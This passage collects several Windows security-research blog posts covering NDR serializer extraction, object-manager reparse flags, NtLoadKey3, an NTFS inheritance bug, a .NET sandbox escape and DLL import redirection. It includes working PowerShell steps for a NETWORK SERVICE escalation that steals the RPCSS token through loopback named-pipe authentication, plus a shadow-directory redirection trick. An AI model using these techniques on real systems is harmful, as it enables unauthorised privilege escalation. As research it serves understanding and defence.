    {
        NdrMesTypeDecode3(
             _MidlEsHandle,
             ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
             &TypeEncoders_ProxyInfo,
             TypePicklingOffsetTable,
             0,
             _pType);
    }

    The NdrMesTypeDecode3 is an API implemented in the RPC runtime DLL. You might be shocked to hear this, but this function and its corresponding NdrMesTypeEncode3 are not documented in MSDN. However, the SDK headers contain enough information to understand how it works.

    The API takes 6 parameters:
    1. The serialization handle, used to maintain state such as the current stream position and can be used multiple times to encode or decode more that one structure in a stream.
    2. The MIDL_TYPE_PICKLING_INFO structure. This structure provides some basic information such as the NDR engine flags.
    3. The MIDL_STUBLESS_PROXY_INFO structure. This contains the format strings and transfer types for both DCE and NDR64 syntax encodings.
    4. A list of type offset arrays, these contains the byte offset into the format string (from the Proxy Info structure) for all type serializers.
    5. The index of the type offset in the 4th parameter.
    6. A pointer to the structure to serialize or deserialize.

    Only parameters 2 through 5 are needed to parse the NDR byte code correctly. Note that the NdrMesType*3 APIs are used for dual DCE and NDR64 serializers. If you compile as 32 bit it will instead use NdrMesType*2 APIs which only support DCE. I'll mention what you need to parse the DCE only APIs later, but for now most things you'll want to extract are going to have a 64 bit build which will almost always use NdrMesType*3 even though my tooling only parses the DCE NDR byte code.

    To parse the type serializers you need to load the DLL you want to extract from into memory using LoadLibrary (to ensure any relocations are processed) then use either the Get-NdrComplexType PS command or the NdrParser::ReadPicklingComplexType method and pass the addresses of the 4 parameters.

    Let's look at an example in KERBEROS.DLL. We'll pick the PAC_DEVICE_INFO structure as it's pretty complex and would require a lot of work to manually write a parser. If you disassemble the PAC_DecodeDeviceInfo function you'll see the call to NdrMesTypeDecode3 as follows (from the DLL in Windows 10 2004 SHA1:173767EDD6027F2E1C2BF5CFB97261D2C6A95969).

    mov     [rsp+28h], r14  ; pObject
    mov     dword ptr [rsp+20h], 5 ; nTypeIndex
    lea     r9, off_1800F3138 ; ArrTypeOffset
    lea     r8, stru_1800D5EA0 ; pProxyInfo
    lea     rdx, stru_1800DEAF0 ; pPicklingInfo
    mov     rcx, [rsp+68h]  ; Handle
    call    NdrMesTypeDecode3

    From this we can extract the following values:

    MIDL_TYPE_PICKLING_INFO = 0x1800DEAF0
    MIDL_STUBLESS_PROXY_INFO = 0x1800D5EA0
    Type Offset Array = 0x1800F3138
    Type Offset Index = 5

    These addresses are using the default load address of the library which is unlikely to be the same as where the DLL is loaded in memory. Get-NdrComplexType supports specifying relative addresses from a base module, so subtract the base address of 0x180000000 before using them. The following script will extract the type information.

    PS> $lib = Import-Win32Module KERBEROS.DLL
    PS> $types = Get-NdrComplexType -PicklingInfo 0xDEAF0 -StublessProxy 0xD5EA0 `
         -OffsetTable 0xF3138 -TypeIndex 5 -Module $lib

    As long as there was no error from this command the $types variable will now contain the parsed complex types, in this case there'll be more than one. Now you can format them to a C# source code file to use in your application using Format-RpcComplexType.

    PS> Format-RpcComplexType $types -Pointer

    This will generate a C# file which looks like this. The code contains Encoder and Decoder classes with static methods for each structure. We also passed the Pointer parameter to Format-RpcComplexType. This is so that the structured are wrapped inside a Unique Pointers. This is the default when using the real RPC runtime, although except for Conformant Structures isn't strictly necessary. If you don't do this then the decode will typically fail, certainly in this case.

    You might notice a serious issue with the generated code, there are no proper structure names. This is unavoidable, the MIDL compiler doesn't keep any name information with the NDR byte code, only the structure information. However, the basic Visual Studio refactoring tool can make short work of renaming things if you know what the names are supposed to be. You could also manually rename everything in the parsed structure information before using Format-RpcComplexType.

    In this case there is an alternative to all that. We can use the fact that the official MS documentation contains a full IDL for PAC_DEVICE_INFO and its related structures and build our own executable with the NDR byte code to extract. How does this help? If you reference the PAC_DEVICE_INFO structure as part of an RPC interface no only can you avoid having to work out the offsets as Get-RpcServer will automatically find the location you can also use an additional feature to extract the type information from your private symbols to fixup the type information.

    Create a C++ project and in an IDL file copy the PAC_DEVICE_INFO structures from the protocol documentation. Then add the following RPC server.

    [
        uuid(4870536E-23FA-4CD5-9637-3F1A1699D3DC),
        version(1.0),
    ]
    interface RpcServer
    {
        int Test([in] handle_t hBinding, 
                 [unique] PPAC_DEVICE_INFO device_info);
    }

    Add the generated server C code to the project and add the following code somewhere to provide a basic implementation:

    #pragma comment(lib, "rpcrt4.lib")

    extern "C" void* __RPC_USER MIDL_user_allocate(size_t size) {
        return new char[size];
    }

    extern "C" void __RPC_USER MIDL_user_free(void* p) {
        delete[] p;
    }

    int Test(
        handle_t hBinding,
        PPAC_DEVICE_INFO device_info) {
        printf("Test %p\n", device_info);
        return 0;
    }

    Now compile the executable as a 64-bit release build if you're using 64-bit PS. The release build ensures there's no weird debug stub in front of your function which could confuse the type information. The implementation of Test needs to be unique, otherwise the linker will fold a duplicate function and the type information will be lost, we just printf a unique string.

    Now parse the RPC server using Get-RpcServer and format the complex types.

    PS> $rpc = Get-RpcServer RpcServer.exe -ResolveStructureNames
    PS> Format-RpcComplexType $rpc.ComplexTypes -Pointer

    If everything has worked you'll now find the output to be much more useful. Admittedly I also did a bit of further cleanup in my version in NtApiDotNet as I didn't need the encoders and I added some helper functions.

    Before leaving this topic I should point out how to handle called to NdrMesType*2 in case you need to extract data from a library which uses that API. The parameters are slightly different to NdrMesType*3.

    void
    TEST_TYPE_Decode(
        handle_t _MidlEsHandle,
        TEST_TYPE * _pType)
    {
        NdrMesTypeDecode2(
             _MidlEsHandle,
             ( PMIDL_TYPE_PICKLING_INFO  )&__MIDL_TypePicklingInfo,
             &TypeEncoders_StubDesc,
             ( PFORMAT_STRING  )&types__MIDL_TypeFormatString.Format[2],
             _pType);
    }
    1. The serialization handle.
    2. The MIDL_TYPE_PICKLING_INFO structure.
    3. The MIDL_STUB_DESC structure. This only contains DCE NDR byte code.
    4. A pointer into the format string for the start of the type.
    5. A pointer to the structure to serialize or deserialize.
    Again we can discard the first and last parameters. You can then get the addresses of the middle three and pass them to Get-NdrComplexType.

    PS> Get-NdrComplexType -PicklingInfo 0x1234 `
        -StubDesc 0x2345 -TypeFormat 0x3456 -Module $lib

    You'll notice that there's a offset in the format string (2 in this case) which you can pass instead of the address in memory. It depends what information your disassembler shows:

    PS> Get-NdrComplexType -PicklingInfo 0x1234 `
        -StubDesc 0x2345 -TypeOffset 2 -Module $lib

    Hopefully this is useful for implementing these NDR serializers in C#. As they don't rely on any native code (or the RPC runtime) you should be able to use them on other platforms in .NET Core even if you can't use the ALPC RPC code.

    OBJ_DONT_REPARSE is (mostly) Useless.

    By: tiraniddo
    23 May 2020 at 10:21
    Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

    To quote the documentation, OBJ_DONT_REPARSE does the following:

    "If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

    This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

    PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
    Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

    Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

    I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

    Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

    PS> $d = Get-NtDirectory \Device
    PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
    PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
    PS> $f.FullPath
    \Device\HarddiskVolume3\Windows\notepad.exe

    Oh well...

    Silent Exploit Mitigations for the 1%

    By: tiraniddo
    22 May 2020 at 23:59
    With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

    One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

    While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

    UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

    The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

    Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

    * Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

    When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

    RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

    Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

    Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

    It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

    Writing Windows File System Drivers is Hard.

    By: tiraniddo
    20 May 2020 at 21:29
    A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

    The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

    The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

    But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

    C:\> mkdir ABC
    C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
    C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

    First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

    C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
    Incorrect function.

    We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

    C:\> icacls ABC\XYZ
    ABC\XYZ NT AUTHORITY\NETWORK:(I)(F)
            NT AUTHORITY\SYSTEM:(I)(F)
            BUILTIN\Administrators:(I)(F)

    Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

    C:\> dir ABC
     Volume in drive C has no label.
     Volume Serial Number is 9A7B-865C

     Directory of C:\ABC

    2020-05-20  19:09    <DIR>          .
    2020-05-20  19:09    <DIR>          ..
    2020-05-20  19:05    <DIR>          XYZ


    Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

    Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.


    Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

    By: tiraniddo
    7 May 2020 at 23:12
    It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

    Cannot serialize delegates over unmanaged function pointers, 
    dynamic methods or methods outside the delegate creator's assembly.
       
    I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

    It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

    .NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

    View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

    What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

    However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

    View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

    The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
    void Callback(object obj, EventArgs e)

    and would call the File.OpenRead function which has the prototype:

    FileStream OpenRead(string path).

    That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

    EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

    Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

    Turns out there's another way. See if you can spot the difference here.

    Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
    EventHandle f = lambda.Compile()

    We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

    That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

    View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

    I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

    Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

    The end result looks like the following:

    View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

    Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.


    Sharing a Logon Session a Little Too Much

    By: tiraniddo
    25 April 2020 at 23:34
    The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

    Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

    "A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

    What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

    Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

    Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

    PS> Get-RunningService "rpcss"
    Name  Status  ProcessId
    ----  ------  ---------
    rpcss Running 1152

    PS> $p = Get-NtProcess -ProcessId 1152
    Get-NtProcess : (0xC0000022) - {Access Denied}
    A process has requested access to an object, but has not been granted those access rights.

    Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

    PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
    PS> $job = Start-Job { $pipe.Listen() }

    Next open a handle to the pipe via localhost, and then wait for the job to complete.

    PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
    PS> Wait-Job $job | Out-Null

    Finally open the RPCSS process again while impersonating the named pipe.

    PS> $p = Use-NtObject($pipe.Impersonate()) { 
    >>     Get-NtProcess -ProcessId 1152 
    >>  }
    PS> $p.GrantedAccess
    AllAccess

    How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

    PS> $token = Use-NtObject($pipe.Impersonate()) { 
    >> Get-NtToken -Impersonation 
    >> }
    PS> $token.Groups | ? Name -Match Rpcss
    Name             Attributes
    ----             ----------
    NT SERVICE\RpcSs EnabledByDefault, Owner

    Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

    Taking a joke a little too far.

    By: tiraniddo
    1 April 2020 at 11:00

    Extract from “Rainbow Dash and the Open Plan Office”.

    This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

    Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of distain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

    Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

    “Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

    Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

    “Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

    To be continued… not.

    Getting an Interactive Service Account Shell

    By: tiraniddo
    9 February 2020 at 23:21
    Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

    To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

    PS> $p = Start-Win32ChildProcess powershell

    And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

    PS> $user = Get-NtSid -KnownSid LocalService
    PS> $p = Start-Win32ChildProcess powershell -User $user

    The process starts, however you'll find it immediately dies:

    PS> $p.ExitNtStatus
    STATUS_DLL_INIT_FAILED

    The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

    I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

    One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

    First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

    PS>  $sess = Get-NtToken -Session

    We can print out the Logon Session SID now, for interest:

    PS> $sess.LogonSid.Sid
    Name                                     Sid
    ----                                     ---
    NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

    Now create a Local Service token (or Network Service, or IUser, or any service account) using:

    PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

    You can now create an interactive process on the current desktop using:

    PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

    You should find it now works :-)

    A command prompt, running whois and showing the use as Local Service.



    DLL Import Redirection in Windows 10 1909

    By: tiraniddo
    8 February 2020 at 16:47
    While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

    What piqued my interesting was during initialization I saw the following code being called:

    NTSTATUS LdrpInitializeImportRedirection() {
        PUNICODE_STRING RedirectionDllName =     
              &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
        if (RedirectionDllName->Length) {
            PVOID Dll;
            NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
            if (NT_SUCCESS(status)) {
                LdrpBuildImportRedirection(Dll);
            }
            // ...
        }

    }

    The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

    Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

    BOOL CreateProcessInternalW(...) {
        LPWSTR RedirectionDllName = NULL;
        if (!PackageBreakaway) {
            BasepAppXExtension(PackageName, &RedirectionDllName, ...);
        }


        RTL_USER_PROCESS_PARAMETERS Params = {};
        BasepCreateProcessParameters(&Params, ...);
        if (RedirectionDllName) {
            RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
        }


        // ...

    }

    The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

    Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

    <xs:element name="Properties">
      <xs:complexType>
        <xs:all>
          <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                      minOccurs="0"/>
        </xs:all>
      </xs:complexType>
    </xs:element>

    This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

    With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

    BOOL WINAPI CreateProcessWForwarder(
        LPCWSTR lpApplicationName,
        LPWSTR lpCommandLine,
        LPSECURITY_ATTRIBUTES lpProcessAttributes,
        LPSECURITY_ATTRIBUTES lpThreadAttributes,
        BOOL bInheritHandles,
        DWORD dwCreationFlags,
        LPVOID lpEnvironment,
        LPCWSTR lpCurrentDirectory,
